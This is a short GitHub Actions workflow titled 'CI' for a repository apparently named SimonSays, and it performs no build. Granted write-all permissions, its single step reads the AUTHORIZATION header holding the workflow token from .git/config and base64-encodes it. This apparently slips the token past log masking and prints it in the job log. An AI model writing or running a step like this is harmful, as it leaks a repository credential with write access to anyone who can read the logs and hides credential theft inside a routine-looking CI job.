
name: CI

on: [push]
  
jobs:
  build:
    runs-on: ubuntu-latest
    permissions: write-all
    steps:
      - uses: actions/checkout@v3

      - name: Run a multi-line script
        run: |
          cd /home/runner/work/SimonSays/SimonSays/.git
          ls -a
          openssl --help
          cat config | sed -n 's/\textraheader = AUTHORIZATION: basic \(.*\)/\1/p' | base64
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} 
